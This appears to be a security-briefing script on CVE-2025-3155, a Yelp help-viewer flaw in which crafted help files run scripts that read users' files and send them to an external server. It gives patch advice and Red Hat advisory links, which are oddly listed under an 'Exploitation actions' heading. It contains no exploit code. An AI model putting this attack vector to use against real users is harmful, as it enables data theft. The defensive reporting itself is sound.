yelp: arbitrary file-read and script execution in Yelp Help Viewer (CVE-2025-3155) (CVE-2025-3155) #shorts

Summary

Welcome to today’s security briefing. In this episode we’ll cover CVE-2025-3155, a critical flaw discovered in Yelp, the GNOME Help Viewer. Published on April 3, 2025, this vulnerability allows specially crafted help documents to execute arbitrary scripts, putting user data at risk of exfiltration. We’ll explain what products are affected, the nature of the flaw, and how you can protect your systems.

Product details

Yelp is the GTK-based help viewer used by the GNOME desktop environment and is included in many Linux distributions, including Fedora, Red Hat Enterprise Linux, Ubuntu and others. The packages in question are ‘yelp’ and its stylesheet processor ‘yelp-xsl’. Fedora 42 has already released updates for both packages to address the issue. Users of any GNOME-based Linux distribution running an unpatched version of Yelp should take notice.

Vulnerability type summary

CVE-2025-3155 falls under ‘Inclusion of Functionality from Untrusted Control Sphere’. In essence, the help viewer fails to properly sanitize or restrict scripting in help documents, allowing untrusted content to run code on the user’s machine. This kind of flaw is akin to script‐injection or code‐injection vulnerabilities seen in web applications, but here the attack vector is the local help system.

Details of the vulnerability

A malicious actor can craft a help file that contains embedded script directives. When Yelp opens that document, it executes the embedded scripts without adequate sandboxing or user consent. Those scripts can read arbitrary files from the victim’s home directory and transmit them to an external server. There’s no user prompt or warning; the attack appears as a normal help dialog. An attacker only needs to trick the user into opening the compromised help file, for example by supplying it in a download or via a compromised repository.

Conclusion

To protect your environment, update your yelp and yelp-xsl packages to the latest versions released by your distribution. Fedora 42 users should apply the advisories as soon as possible. Administrators of GNOME-based desktops should also audit any custom help documents and verify their integrity. Although no widespread exploits have been reported yet, the potential for data exfiltration makes timely patching essential. That’s it for this episode—stay safe and keep your software up to date.

This chain involves the following actors

• Malicious user: Attacker who crafts and distributes a malicious help document
• End user: Victim who opens the malicious document in Yelp

This following systems are involved

• Yelp Help Viewer (Render user help documentation for GNOME applications): Vulnerable application that executes embedded scripts
• GNOME-based Linux distribution (Operating system environment hosting Yelp): Platform on which Yelp and its dependencies run

Attack entry point

• Help document loader: Component in Yelp that parses and renders help files, including embedded script elements

Remediation actions

Exploitation actions

• https://access.redhat.com/errata/RHSA-2025:4450
• https://access.redhat.com/errata/RHSA-2025:4451
• https://access.redhat.com/errata/RHSA-2025:4455
• https://access.redhat.com/errata/RHSA-2025:4456
• https://access.redhat.com/errata/RHSA-2025:4457
• https://access.redhat.com/errata/RHSA-2025:4505
• https://access.redhat.com/errata/RHSA-2025:4532
• https://access.redhat.com/errata/RHSA-2025:7430
• https://access.redhat.com/errata/RHSA-2025:7569
• https://access.redhat.com/security/cve/CVE-2025-3155
• https://bugzilla.redhat.com/show_bug.cgi?id=2357091
• [2025-05-12] A security flaw in Yelp Help Viewer (CVE-2025-3155) affects GNOME-based Linux distributions.
• [2025-05-21] Fedora 42 updates yelp-xsl to fix CVE-2025-3155, an arbitrary file-read vulnerability.
• [2025-05-21] Fedora 42 updates yelp to fix CVE-2025-3155, an arbitrary file-read vulnerability.